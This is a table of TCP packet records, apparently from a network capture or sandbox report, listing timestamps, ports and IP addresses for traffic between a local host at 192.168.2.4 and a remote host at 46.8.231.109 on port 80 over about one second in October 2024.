Oct 2, 2024 09:41:27.737134933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737149954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737164021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737178087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737188101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737188101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737188101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737188101 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737191916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737206936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737221003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737236023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737270117 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737282991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737297058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737312078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737327099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737337112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737341881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737356901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737370014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737374067 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737374067 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737397909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737404108 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737411022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737432957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737447023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737462044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737477064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737514019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737575054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737590075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737602949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737617970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737632036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737646103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737657070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737657070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737657070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737657070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737660885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737719059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737732887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737746954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737761021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737776041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737790108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737807989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737827063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737842083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737854958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737870932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737884998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737899065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737914085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737930059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.737956047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737956047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737956047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737957001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737957001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.737957001 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738085985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738107920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738121986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738136053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738151073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738164902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738178968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738193989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738203049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738203049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738203049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738203049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738203049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738209009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738223076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738238096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738251925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738267899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738282919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738287926 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738289118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738289118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738289118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738289118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738289118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738297939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738356113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738356113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738356113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738364935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738379002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738393068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738406897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738487005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738501072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738514900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738516092 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738517046 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738517046 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738517046 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738528967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738543987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738558054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.738703966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738703966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738703966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.738703966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.739737988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739788055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739801884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739836931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739850998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739864111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.739887953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.739887953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.739887953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.739957094 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.741034031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.741049051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.741101027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.793802977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.793833017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.793890953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.793941975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.793976068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794027090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794058084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794090033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794100046 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794101000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794101000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794101000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794101000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794122934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794209003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794239998 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794271946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794321060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794353008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794401884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794433117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794464111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794495106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794503927 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794543982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794575930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794605970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794636965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794686079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794718027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794749022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794780970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794812918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794822931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794823885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794823885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794823885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794823885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794823885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.794862986 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794891119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794922113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.794954062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795002937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795033932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795082092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795114040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795145035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795177937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795186043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795226097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795258999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795289993 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795321941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795356989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795413017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795413017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795413017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795423985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795454025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795506001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795537949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795571089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795603037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795634985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795667887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795747995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795747995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795747995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795747995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795747995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.795753002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795787096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795820951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795851946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795883894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795916080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795948029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.795979977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796022892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796024084 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796055079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796087980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796119928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796152115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796184063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796216011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796225071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796248913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796282053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796313047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796345949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:27.796997070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796997070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796998024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796998024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.796998024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.891187906 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:27.896187067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066554070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066591024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066643000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066658020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.066695929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066728115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066761017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066792965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066824913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066855907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066906929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066936970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.066968918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067001104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067013979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067033052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067081928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067081928 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067131042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067162037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067198038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067229033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067260027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067291021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067322969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067353964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067364931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067364931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067364931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067364931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067364931 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067405939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067425013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067468882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067522049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067569971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067601919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067632914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067666054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067697048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067730904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067761898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067789078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067789078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067789078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067789078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067789078 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.067796946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067827940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067859888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067890882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067920923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067953110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.067985058 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068016052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068047047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068078041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068109989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068140984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068135977 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068136930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068136930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068172932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068208933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068232059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068232059 CEST	49749	80	192.168.2.4	46.8.231.109
